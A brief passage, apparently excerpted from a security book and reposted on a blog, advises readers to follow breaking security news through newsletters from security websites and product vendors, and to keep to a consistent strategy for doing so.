Regardless of your prior experience, you need to devise a strategy for staying abreast of breaking security news. Subscribing to the newsletters both from the more prevalent security-focused Web sites and from the product developers may be the best way to do so. However, your strategic prefer- ence is somewhat irrelevant; what is important is that you have a strategy and stick to it, lest your castle be conquered.

0 comments: